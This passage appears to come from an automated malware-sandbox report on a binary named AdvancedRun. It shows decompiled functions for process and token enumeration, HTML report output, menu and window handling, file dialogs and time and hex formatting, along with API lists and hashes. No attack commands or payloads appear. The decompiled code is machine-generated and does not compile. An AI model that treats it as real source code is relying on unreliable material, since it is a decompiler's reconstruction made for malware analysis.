				intOrPtr _v12;
				void* _v16;
				intOrPtr _v20;
				char _v32;
				char _v72;
				void _v582;
				long _v584;
				void* __edi;
				intOrPtr _t27;
				wchar_t* _t34;
				wchar_t* _t42;
				long* _t43;
				int _t44;
				void* _t52;
				void* _t54;
				long _t56;
				long* _t57;
				void* _t60;

				_t60 = __eflags;
				_t52 = __edx;
				E004095AB( &_v72);
				_v584 = 0;
				memset( &_v582, 0, 0x1fe);
				E004095FD(_t52, _t60,  &_v72);
				_t27 = 0;
				_v12 = 0;
				if(_v20 <= 0) {
					L10:
					_t56 = 0;
				} else {
					do {
						_t57 = E00405A92(_t27,  &_v32);
						if(E00409A94( *_t57,  &_v584) == 0) {
							goto L9;
						} else {
							_t34 =  &_v584;
							_push(_t34);
							_push(_a4);
							L0040B278();
							if(_t34 == 0) {
								L5:
								_t44 = 0;
								_t54 = OpenProcess(0x2000000, 0,  *_t57);
								if(_t54 == 0) {
									goto L9;
								} else {
									_v16 = _v16 & 0;
									if(OpenProcessToken(_t54, 2,  &_v16) != 0) {
										_t44 = 1;
										CloseHandle(_v16);
									}
									CloseHandle(_t54);
									if(_t44 != 0) {
										_t56 =  *_t57;
									} else {
										goto L9;
									}
								}
							} else {
								_t42 = wcschr( &_v584, 0x5c);
								if(_t42 == 0) {
									goto L9;
								} else {
									_t43 =  &(_t42[0]);
									_push(_t43);
									_push(_a4);
									L0040B278();
									if(_t43 != 0) {
										goto L9;
									} else {
										goto L5;
									}
								}
							}
						}
						goto L12;
						L9:
						_t27 = _v12 + 1;
						_v12 = _t27;
					} while (_t27 < _v20);
					goto L10;
				}
				L12:
				E004095DA( &_v72);
				return _t56;
			}





















                                                                  0x0040598b
                                                                  0x0040598b
                                                                  0x0040599a
                                                                  0x004059ae
                                                                  0x004059b5
                                                                  0x004059c1
                                                                  0x004059c6
                                                                  0x004059cb
                                                                  0x004059ce
                                                                  0x00405a7b
                                                                  0x00405a7b
                                                                  0x004059d4
                                                                  0x004059d4
                                                                  0x004059dc
                                                                  0x004059ee
                                                                  0x00000000
                                                                  0x004059f0
                                                                  0x004059f0
                                                                  0x004059f6
                                                                  0x004059f7
                                                                  0x004059fa
                                                                  0x00405a03
                                                                  0x00405a2b
                                                                  0x00405a2e
                                                                  0x00405a3c
                                                                  0x00405a40
                                                                  0x00000000
                                                                  0x00405a42
                                                                  0x00405a42
                                                                  0x00405a54
                                                                  0x00405a59
                                                                  0x00405a5a
                                                                  0x00405a5a
                                                                  0x00405a61
                                                                  0x00405a69
                                                                  0x00405a7f
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00405a69
                                                                  0x00405a05
                                                                  0x00405a0e
                                                                  0x00405a17
                                                                  0x00000000
                                                                  0x00405a19
                                                                  0x00405a19
                                                                  0x00405a1c
                                                                  0x00405a1d
                                                                  0x00405a20
                                                                  0x00405a29
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00405a29
                                                                  0x00405a17
                                                                  0x00405a03
                                                                  0x00000000
                                                                  0x00405a6b
                                                                  0x00405a6e
                                                                  0x00405a72
                                                                  0x00405a72
                                                                  0x00000000
                                                                  0x004059d4
                                                                  0x00405a81
                                                                  0x00405a84
                                                                  0x00405a8f

                                                                  APIs
                                                                  • memset.MSVCRT ref: 004059B5
                                                                    • Part of subcall function 004095FD: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00409619
                                                                    • Part of subcall function 004095FD: memset.MSVCRT ref: 0040962E
                                                                    • Part of subcall function 004095FD: Process32FirstW.KERNEL32(?,?), ref: 0040964A
                                                                    • Part of subcall function 004095FD: Process32NextW.KERNEL32(?,0000022C), ref: 0040978C
                                                                    • Part of subcall function 004095FD: CloseHandle.KERNEL32(?,?,0000022C,?,?,?,?,00000000,?), ref: 0040979C
                                                                    • Part of subcall function 00409A94: memset.MSVCRT ref: 00409AB7
                                                                    • Part of subcall function 00409A94: memset.MSVCRT ref: 00409ACF
                                                                    • Part of subcall function 00409A94: OpenProcess.KERNEL32(00000400,00000000,?,?,?,?,?,00000000,00000000), ref: 00409AE0
                                                                    • Part of subcall function 00409A94: memset.MSVCRT ref: 00409B25
                                                                    • Part of subcall function 00409A94: GetProcAddress.KERNEL32(?,GetTokenInformation), ref: 00409B4B
                                                                    • Part of subcall function 00409A94: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,00000008,?), ref: 00409C26
                                                                    • Part of subcall function 00409A94: FreeLibrary.KERNEL32(?,?,?,?,?,?,00000000,00000008,?,?,?,?,?,00000000,00000000), ref: 00409C34
                                                                  • _wcsicmp.MSVCRT ref: 004059FA
                                                                  • wcschr.MSVCRT ref: 00405A0E
                                                                  • _wcsicmp.MSVCRT ref: 00405A20
                                                                  • OpenProcess.KERNEL32(02000000,00000000,00000000,00000000,?,?,?,?,00000000), ref: 00405A36
                                                                  • OpenProcessToken.ADVAPI32(00000000,00000002,?), ref: 00405A4C
                                                                  • CloseHandle.KERNEL32(?), ref: 00405A5A
                                                                  • CloseHandle.KERNEL32(00000000), ref: 00405A61
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.281017774.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000007.00000002.281011952.0000000000400000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000007.00000002.281026440.000000000040C000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000007.00000002.281033089.000000000040F000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000007.00000002.281038498.000000000041D000.00000002.00020000.sdmp Download File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: memset$CloseHandle$OpenProcess$Process32_wcsicmp$AddressCreateFirstFreeLibraryNextProcSnapshotTokenToolhelp32wcschr
                                                                  • String ID:
                                                                  • API String ID: 768606695-0
                                                                  • Opcode ID: 24c99ff6b226417a7cff51520edeb71ca8997190fc09f0f890f68f92aaad849e
                                                                  • Instruction ID: 2def5e4e0f7fb713a9aee1133a075480eaa7d54608268b88a97ef3230c71c50c
                                                                  • Opcode Fuzzy Hash: 24c99ff6b226417a7cff51520edeb71ca8997190fc09f0f890f68f92aaad849e
                                                                  • Instruction Fuzzy Hash: 18318472A00619ABDB10EBA1DD89AAF77B8EF04345F10457BE905F2191EB349E018F98
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00407639, Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 103COMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 64%
                                                                  			E00407639(intOrPtr* __ebx, intOrPtr _a4, intOrPtr* _a8) {
				signed int _v8;
				intOrPtr _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				void _v68;
				char _v108;
				void _v160;
				void* __esi;
				signed int _t55;
				void* _t57;
				wchar_t* _t67;
				intOrPtr* _t73;
				signed int _t74;
				signed int _t86;
				signed int _t95;
				intOrPtr* _t98;
				void* _t100;
				void* _t102;

				_t73 = __ebx;
				_t74 = 0xd;
				_push(9);
				memcpy( &_v160, L"<td bgcolor=#%s nowrap>%s", _t74 << 2);
				memcpy( &_v68, L"<td bgcolor=#%s>%s", 0 << 2);
				_t102 = _t100 + 0x18;
				asm("movsw");
				E00407343(__ebx, _a4, L"<tr>");
				_t95 = 0;
				if( *((intOrPtr*)(__ebx + 0x2c)) > 0) {
					do {
						_t55 =  *( *((intOrPtr*)(_t73 + 0x30)) + _t95 * 4);
						_v8 = _t55;
						_t57 =  &_v160;
						if( *((intOrPtr*)(_t55 * 0x14 +  *((intOrPtr*)(_t73 + 0x40)) + 8)) == 0) {
							_t57 =  &_v68;
						}
						_t98 = _a8;
						_v28 = _v28 | 0xffffffff;
						_v24 = _v24 | 0xffffffff;
						_v20 = _v20 | 0xffffffff;
						_v16 = _v16 & 0x00000000;
						_v12 = _t57;
						 *((intOrPtr*)( *_t73 + 0x34))(5, _t95, _t98,  &_v28);
						E0040ADC0(_v28,  &_v108);
						E0040ADF1( *((intOrPtr*)( *_t98))(_v8,  *((intOrPtr*)(_t73 + 0x60))),  *(_t73 + 0x64));
						 *((intOrPtr*)( *_t73 + 0x50))( *(_t73 + 0x64), _t98, _v8);
						_t67 =  *(_t73 + 0x64);
						_t86 =  *_t67 & 0x0000ffff;
						if(_t86 == 0 || _t86 == 0x20) {
							wcscat(_t67, L"&nbsp;");
						}
						E0040AE90( &_v28,  *((intOrPtr*)(_t73 + 0x68)),  *(_t73 + 0x64));
						_push( *((intOrPtr*)(_t73 + 0x68)));
						_push( &_v108);
						_push(_v12);
						_push(0x2000);
						_push( *((intOrPtr*)(_t73 + 0x60)));
						L0040B1EC();
						_t102 = _t102 + 0x1c;
						E00407343(_t73, _a4,  *((intOrPtr*)(_t73 + 0x60)));
						_t95 = _t95 + 1;
					} while (_t95 <  *((intOrPtr*)(_t73 + 0x2c)));
				}
				return E00407343(_t73, _a4, L"\r\n");
			}























                                                                  0x00407639
                                                                  0x00407646
                                                                  0x00407647
                                                                  0x00407654
                                                                  0x0040765f
                                                                  0x0040765f
                                                                  0x0040766b
                                                                  0x0040766d
                                                                  0x00407672
                                                                  0x00407677
                                                                  0x0040767d
                                                                  0x00407680
                                                                  0x00407686
                                                                  0x00407691
                                                                  0x00407697
                                                                  0x00407699
                                                                  0x00407699
                                                                  0x0040769c
                                                                  0x0040769f
                                                                  0x004076a3
                                                                  0x004076a7
                                                                  0x004076ab
                                                                  0x004076b5
                                                                  0x004076be
                                                                  0x004076c8
                                                                  0x004076de
                                                                  0x004076ee
                                                                  0x004076f1
                                                                  0x004076f4
                                                                  0x004076fa
                                                                  0x00407708
                                                                  0x0040770e
                                                                  0x00407718
                                                                  0x0040771d
                                                                  0x00407723
                                                                  0x00407724
                                                                  0x00407727
                                                                  0x0040772c
                                                                  0x0040772f
                                                                  0x00407734
                                                                  0x0040773f
                                                                  0x00407744
                                                                  0x00407745
                                                                  0x0040767d
                                                                  0x00407760

                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.281017774.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000007.00000002.281011952.0000000000400000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000007.00000002.281026440.000000000040C000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000007.00000002.281033089.000000000040F000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000007.00000002.281038498.000000000041D000.00000002.00020000.sdmp Download File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: _snwprintfwcscat
                                                                  • String ID: &nbsp;$<td bgcolor=#%s nowrap>%s$<td bgcolor=#%s>%s$<tr>
                                                                  • API String ID: 384018552-4153097237
                                                                  • Opcode ID: 95fb47b0eb5c6bd29b2c4fa7ee5083eabdad1f03c3a152d85f26f239cd8b3326
                                                                  • Instruction ID: d8c40f1c932df66c49e6576a1425660ae0ae50b86724cae367092fb81a03718d
                                                                  • Opcode Fuzzy Hash: 95fb47b0eb5c6bd29b2c4fa7ee5083eabdad1f03c3a152d85f26f239cd8b3326
                                                                  • Instruction Fuzzy Hash: 75318C31A00209EFDF14AF55CC86AAA7B76FF04320F1001AAF905BB2D2D735AA51DB95
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 0040605E, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 79windowCOMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 42%
                                                                  			E0040605E(void* __ecx, void* __eflags, intOrPtr _a4, struct HMENU__* _a8, intOrPtr _a12, int _a16, intOrPtr _a20, wchar_t* _a36, intOrPtr _a40, long _a48, void _a50) {
				struct tagMENUITEMINFOW _v0;
				int _t24;
				wchar_t* _t30;
				intOrPtr _t32;
				int _t34;
				int _t42;
				signed int _t47;
				signed int _t48;

				_t36 = __ecx;
				_t48 = _t47 & 0xfffffff8;
				E0040B550(0x203c, __ecx);
				_t24 = GetMenuItemCount(_a8);
				_t34 = _t24;
				_t42 = 0;
				if(_t34 <= 0) {
					L13:
					return _t24;
				} else {
					goto L1;
				}
				do {
					L1:
					memset( &_a50, 0, 0x2000);
					_t48 = _t48 + 0xc;
					_a36 =  &_a48;
					_v0.cbSize = 0x30;
					_a4 = 0x36;
					_a40 = 0x1000;
					_a16 = 0;
					_a48 = 0;
					_t24 = GetMenuItemInfoW(_a8, _t42, 1,  &_v0);
					if(_t24 == 0) {
						goto L12;
					}
					if(_a48 == 0) {
						L10:
						_t56 = _a20;
						if(_a20 != 0) {
							_push(0);
							_push(_a20);
							_push(_a4);
							_t24 = E0040605E(_t36, _t56);
							_t48 = _t48 + 0xc;
						}
						goto L12;
					}
					_t30 = wcschr( &_a48, 9);
					if(_t30 != 0) {
						 *_t30 = 0;
					}
					_t31 = _a16;
					if(_a20 != 0) {
						if(_a12 == 0) {
							 *0x40fe20 =  *0x40fe20 + 1;
							_t32 =  *0x40fe20; // 0x0
							_t31 = _t32 + 0x11558;
							__eflags = _t32 + 0x11558;
						} else {
							_t17 = _t42 + 0x11171; // 0x11171
							_t31 = _t17;
						}
					}
					_t24 = E00406025(_t31,  &_a48);
					_pop(_t36);
					goto L10;
					L12:
					_t42 = _t42 + 1;
				} while (_t42 < _t34);
				goto L13;
			}











                                                                  0x0040605e
                                                                  0x00406061
                                                                  0x00406069
                                                                  0x00406074
                                                                  0x0040607a
                                                                  0x0040607e
                                                                  0x00406082
                                                                  0x00406148
                                                                  0x0040614e
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00406088
                                                                  0x00406088
                                                                  0x00406093
                                                                  0x00406098
                                                                  0x0040609f
                                                                  0x004060ae
                                                                  0x004060b6
                                                                  0x004060be
                                                                  0x004060c6
                                                                  0x004060ca
                                                                  0x004060cf
                                                                  0x004060d7
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x004060de
                                                                  0x00406129
                                                                  0x00406129
                                                                  0x0040612d
                                                                  0x0040612f
                                                                  0x00406130
                                                                  0x00406134
                                                                  0x00406137
                                                                  0x0040613c
                                                                  0x0040613c
                                                                  0x00000000
                                                                  0x0040612d
                                                                  0x004060e7
                                                                  0x004060f0
                                                                  0x004060f2
                                                                  0x004060f2
                                                                  0x004060f9
                                                                  0x004060fd
                                                                  0x00406102
                                                                  0x0040610c
                                                                  0x00406112
                                                                  0x00406117
                                                                  0x00406117
                                                                  0x00406104
                                                                  0x00406104
                                                                  0x00406104
                                                                  0x00406104
                                                                  0x00406102
                                                                  0x00406122
                                                                  0x00406128
                                                                  0x00000000
                                                                  0x0040613f
                                                                  0x0040613f
                                                                  0x00406140
                                                                  0x00000000

                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.281017774.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000007.00000002.281011952.0000000000400000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000007.00000002.281026440.000000000040C000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000007.00000002.281033089.000000000040F000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000007.00000002.281038498.000000000041D000.00000002.00020000.sdmp Download File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: ItemMenu$CountInfomemsetwcschr
                                                                  • String ID: 0$6
                                                                  • API String ID: 2029023288-3849865405
                                                                  • Opcode ID: c92d9e803ec22cf5b140ab292b4c2ab892016db16de87d00b51606d693616624
                                                                  • Instruction ID: 45aed224341beddc1f9b42311d86e3f1d1daa84a2c492251b1da63e2972132ba
                                                                  • Opcode Fuzzy Hash: c92d9e803ec22cf5b140ab292b4c2ab892016db16de87d00b51606d693616624
                                                                  • Instruction Fuzzy Hash: 7521F132504304ABC720DF45D84599FB7E8FB85754F000A3FF685A62D1E776C950CB8A
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00402BEE, Relevance: 10.6, APIs: 7, Instructions: 79COMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 82%
                                                                  			E00402BEE(void* __ebx) {
				int _v8;
				int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				int _v24;
				int _v28;
				void* _t27;
				int _t31;
				void* _t34;
				int _t37;
				int _t38;
				int _t41;
				int _t50;

				_t34 = __ebx;
				if( *((intOrPtr*)(__ebx + 0x10)) == 0 ||  *((intOrPtr*)(__ebx + 0x14)) == 0) {
					return _t27;
				} else {
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_v8 = GetSystemMetrics(0x4e);
					_v12 = GetSystemMetrics(0x4f);
					_t41 = GetSystemMetrics(0x4c);
					_t31 = GetSystemMetrics(0x4d);
					if(_v8 == 0 || _v12 == 0) {
						_v8 = GetSystemMetrics(0);
						_v12 = GetSystemMetrics(1);
						_t41 = 0;
						_t31 = 0;
					} else {
						_v8 = _v8 + _t41;
						_v12 = _v12 + _t31;
					}
					_t50 = _v20 - _v28;
					if(_t50 > 0x14) {
						_t38 = _v24;
						_t37 = _v16 - _t38;
						if(_t37 > 0x14 && _v20 > _t41 + 5) {
							_t31 = _t31 + 0xfffffff6;
							if(_t38 >= _t31) {
								_t31 = _v28;
								if(_t31 + 0x14 < _v8 && _t38 + 0x14 < _v12 &&  *((intOrPtr*)(_t34 + 0x1c)) != 0) {
									_t31 = SetWindowPos( *(_t34 + 0x10), 0, _t31, _t38, _t50, _t37, 0x204);
								}
							}
						}
					}
					return _t31;
				}
			}
















                                                                  0x00402bee
                                                                  0x00402bf8
                                                                  0x00402cae
                                                                  0x00402c08
                                                                  0x00402c10
                                                                  0x00402c11
                                                                  0x00402c12
                                                                  0x00402c13
                                                                  0x00402c20
                                                                  0x00402c27
                                                                  0x00402c2e
                                                                  0x00402c30
                                                                  0x00402c37
                                                                  0x00402c4b
                                                                  0x00402c50
                                                                  0x00402c53
                                                                  0x00402c55
                                                                  0x00402c3e
                                                                  0x00402c3e
                                                                  0x00402c41
                                                                  0x00402c41
                                                                  0x00402c5a
                                                                  0x00402c60
                                                                  0x00402c65
                                                                  0x00402c68
                                                                  0x00402c6d
                                                                  0x00402c77
                                                                  0x00402c7c
                                                                  0x00402c7e
                                                                  0x00402c87
                                                                  0x00402ca5
                                                                  0x00402ca5
                                                                  0x00402c87
                                                                  0x00402c7c
                                                                  0x00402c6d
                                                                  0x00000000
                                                                  0x00402cac

                                                                  APIs
                                                                  • GetSystemMetrics.USER32 ref: 00402C1C
                                                                  • GetSystemMetrics.USER32 ref: 00402C23
                                                                  • GetSystemMetrics.USER32 ref: 00402C2A
                                                                  • GetSystemMetrics.USER32 ref: 00402C30
                                                                  • GetSystemMetrics.USER32 ref: 00402C47
                                                                  • GetSystemMetrics.USER32 ref: 00402C4E
                                                                  • SetWindowPos.USER32(?,00000000,?,?,?,?,00000204,?,?,?,?,?,?,?,?,0040365B), ref: 00402CA5
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.281017774.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000007.00000002.281011952.0000000000400000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000007.00000002.281026440.000000000040C000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000007.00000002.281033089.000000000040F000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000007.00000002.281038498.000000000041D000.00000002.00020000.sdmp Download File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: MetricsSystem$Window
                                                                  • String ID:
                                                                  • API String ID: 1155976603-0
                                                                  • Opcode ID: 03bfd9196a1312a0750f0a2641b8d8190b91a017e6f04a5dd0b934da2af22e19
                                                                  • Instruction ID: 7065afd7c6b37d04baa6ac94661e9c3c7a9384fc7fb7d7b8ebf201216021487f
                                                                  • Opcode Fuzzy Hash: 03bfd9196a1312a0750f0a2641b8d8190b91a017e6f04a5dd0b934da2af22e19
                                                                  • Instruction Fuzzy Hash: B9217F72D00219EBEF14DF68CE496AF7B75EF40318F11446AD901BB1C5D2B8AD81CA98
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 004036D5, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 78COMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 100%
                                                                  			E004036D5(void* __edi, void* __eflags) {
				intOrPtr _v8;
				char _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				char* _v24;
				char _v28;
				char* _v48;
				intOrPtr _v56;
				intOrPtr _v60;
				int _v64;
				int _v72;
				intOrPtr _v76;
				wchar_t* _v80;
				intOrPtr _v84;
				int _v92;
				char* _v96;
				intOrPtr _v104;
				struct tagOFNA _v108;
				void _v634;
				long _v636;
				void _v2682;
				char _v2684;
				void* __ebx;
				char _t37;
				intOrPtr _t38;
				int _t46;
				signed short _t54;

				_v636 = 0;
				memset( &_v634, 0, 0x208);
				_v2684 = 0;
				memset( &_v2682, 0, 0x7fe);
				_t37 =  *((intOrPtr*)(L"cfg")); // 0x660063
				_v12 = _t37;
				_t38 =  *0x40cbf0; // 0x67
				_v8 = _t38;
				_v28 = E00405B81(0x227);
				_v24 = L"*.cfg";
				_v20 = E00405B81(0x228);
				_v16 = L"*.*";
				E00405236( &_v2684,  &_v28);
				_t54 = 0xa;
				_v60 = E00405B81(_t54);
				_v104 =  *((intOrPtr*)(__edi + 0x10));
				_v48 =  &_v12;
				_v96 =  &_v2684;
				_v108 = 0x4c;
				_v92 = 0;
				_v84 = 1;
				_v80 =  &_v636;
				_v76 = 0x104;
				_v72 = 0;
				_v64 = 0;
				_v56 = 0x80806;
				_t46 = GetSaveFileNameW( &_v108);
				if(_t46 != 0) {
					wcscpy( &_v636, _v80);
					return E0040365E(__edi, 1,  &_v636);
				}
				return _t46;
			}






























                                                                  0x004036ef
                                                                  0x004036f6
                                                                  0x0040370b
                                                                  0x00403712
                                                                  0x00403717
                                                                  0x0040371c
                                                                  0x0040371f
                                                                  0x0040372c
                                                                  0x00403735
                                                                  0x00403738
                                                                  0x00403744
                                                                  0x00403751
                                                                  0x00403758
                                                                  0x00403760
                                                                  0x00403769
                                                                  0x0040376c
                                                                  0x00403778
                                                                  0x0040377b
                                                                  0x0040378b
                                                                  0x00403792
                                                                  0x00403795
                                                                  0x00403798
                                                                  0x0040379b
                                                                  0x004037a2
                                                                  0x004037a5
                                                                  0x004037a8
                                                                  0x004037af
                                                                  0x004037b7
                                                                  0x004037c3
                                                                  0x00000000
                                                                  0x004037d4
                                                                  0x004037dc

                                                                  APIs
                                                                  • memset.MSVCRT ref: 004036F6
                                                                  • memset.MSVCRT ref: 00403712
                                                                    • Part of subcall function 00405B81: GetModuleHandleW.KERNEL32(00000000,?,?,00403490), ref: 00405BC0
                                                                    • Part of subcall function 00405B81: LoadStringW.USER32(00000000,000001F5,?), ref: 00405C59
                                                                    • Part of subcall function 00405B81: memcpy.MSVCRT ref: 00405C99
                                                                    • Part of subcall function 00405B81: wcscpy.MSVCRT ref: 00405C02
                                                                    • Part of subcall function 00405B81: wcslen.MSVCRT ref: 00405C20
                                                                    • Part of subcall function 00405B81: GetModuleHandleW.KERNEL32(00000000,?,?,?,00403490), ref: 00405C2E
                                                                    • Part of subcall function 00405236: memset.MSVCRT ref: 00405257
                                                                    • Part of subcall function 00405236: _snwprintf.MSVCRT ref: 00405285
                                                                    • Part of subcall function 00405236: wcslen.MSVCRT ref: 00405291
                                                                    • Part of subcall function 00405236: memcpy.MSVCRT ref: 004052A9
                                                                    • Part of subcall function 00405236: wcslen.MSVCRT ref: 004052B7
                                                                    • Part of subcall function 00405236: memcpy.MSVCRT ref: 004052CA
                                                                  • GetSaveFileNameW.COMDLG32(?), ref: 004037AF
                                                                  • wcscpy.MSVCRT ref: 004037C3
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.281017774.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000007.00000002.281011952.0000000000400000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000007.00000002.281026440.000000000040C000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000007.00000002.281033089.000000000040F000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000007.00000002.281038498.000000000041D000.00000002.00020000.sdmp Download File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: memcpymemsetwcslen$HandleModulewcscpy$FileLoadNameSaveString_snwprintf
                                                                  • String ID: L$cfg
                                                                  • API String ID: 275899518-3734058911
                                                                  • Opcode ID: 82f9c32c0c79633b068e26f34505a517ae9d13a5a1787d7b2c1c5d310a57e8a8
                                                                  • Instruction ID: 069f946bae6f7cb0c9846f37a0b0d91fba0b14879ba0d1f27e167351657a8a18
                                                                  • Opcode Fuzzy Hash: 82f9c32c0c79633b068e26f34505a517ae9d13a5a1787d7b2c1c5d310a57e8a8
                                                                  • Instruction Fuzzy Hash: 78312AB1D04218AFDB50DFA5D889ADEBBB8FF04314F10416AE508B6280DB746A85CF99
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00404ED0, Relevance: 10.6, APIs: 7, Instructions: 63timeCOMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 100%
                                                                  			E00404ED0(FILETIME* __eax, wchar_t* _a4) {
				struct _SYSTEMTIME _v20;
				long _v276;
				long _v532;
				FILETIME* _t15;

				_t15 = __eax;
				if(__eax->dwHighDateTime != 0 ||  *__eax != 0) {
					if(FileTimeToSystemTime(_t15,  &_v20) == 0 || _v20 <= 0x3e8) {
						goto L5;
					} else {
						GetDateFormatW(0x400, 1,  &_v20, 0,  &_v276, 0x80);
						GetTimeFormatW(0x400, 0,  &_v20, 0,  &_v532, 0x80);
						wcscpy(_a4,  &_v276);
						wcscat(_a4, " ");
						wcscat(_a4,  &_v532);
					}
				} else {
					L5:
					wcscpy(_a4, 0x40c4e8);
				}
				return _a4;
			}







                                                                  0x00404ed0
                                                                  0x00404edf
                                                                  0x00404ef6
                                                                  0x00000000
                                                                  0x00404f00
                                                                  0x00404f1c
                                                                  0x00404f31
                                                                  0x00404f41
                                                                  0x00404f4e
                                                                  0x00404f5d
                                                                  0x00404f66
                                                                  0x00404f69
                                                                  0x00404f69
                                                                  0x00404f71
                                                                  0x00404f77
                                                                  0x00404f7d

                                                                  APIs
                                                                  • FileTimeToSystemTime.KERNEL32(?,?), ref: 00404EEE
                                                                  • GetDateFormatW.KERNEL32(00000400,00000001,000003E8,00000000,?,00000080,?,?,?,?), ref: 00404F1C
                                                                  • GetTimeFormatW.KERNEL32(00000400,00000000,000003E8,00000000,?,00000080,?,?,?,?), ref: 00404F31
                                                                  • wcscpy.MSVCRT ref: 00404F41
                                                                  • wcscat.MSVCRT ref: 00404F4E
                                                                  • wcscat.MSVCRT ref: 00404F5D
                                                                  • wcscpy.MSVCRT ref: 00404F71
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.281017774.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000007.00000002.281011952.0000000000400000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000007.00000002.281026440.000000000040C000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000007.00000002.281033089.000000000040F000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000007.00000002.281038498.000000000041D000.00000002.00020000.sdmp Download File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: Time$Formatwcscatwcscpy$DateFileSystem
                                                                  • String ID:
                                                                  • API String ID: 1331804452-0
                                                                  • Opcode ID: bcd4d34c10f2eb1284b4297ba1ca8defa1a10ff7f0e8a8f4937edf2a6ab2f069
                                                                  • Instruction ID: 27f756489727a3478797c508db698983d473b6c4fef27ef98cb5a9ae0a7a07e8
                                                                  • Opcode Fuzzy Hash: bcd4d34c10f2eb1284b4297ba1ca8defa1a10ff7f0e8a8f4937edf2a6ab2f069
                                                                  • Instruction Fuzzy Hash: 951160B2840119EBDB11AB94DC85EFE776CFB44304F04457ABA05B6090D774AA858BA8
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00404FE0, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 54COMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 71%
                                                                  			E00404FE0(wchar_t* __edi, intOrPtr _a4, signed int _a8) {
				void _v514;
				long _v516;
				wchar_t* _t34;
				signed int _t35;
				void* _t36;
				void* _t37;

				_t34 = __edi;
				_v516 = _v516 & 0x00000000;
				memset( &_v514, 0, 0x1fc);
				 *__edi =  *__edi & 0x00000000;
				_t37 = _t36 + 0xc;
				_t35 = 0;
				do {
					_push( *(_t35 + _a4) & 0x000000ff);
					_push(L"%2.2X");
					_push(0xff);
					_push( &_v516);
					L0040B1EC();
					_t37 = _t37 + 0x10;
					if(_t35 > 0) {
						wcscat(_t34, " ");
					}
					if(_a8 > 0) {
						asm("cdq");
						if(_t35 % _a8 == 0) {
							wcscat(_t34, L"  ");
						}
					}
					wcscat(_t34,  &_v516);
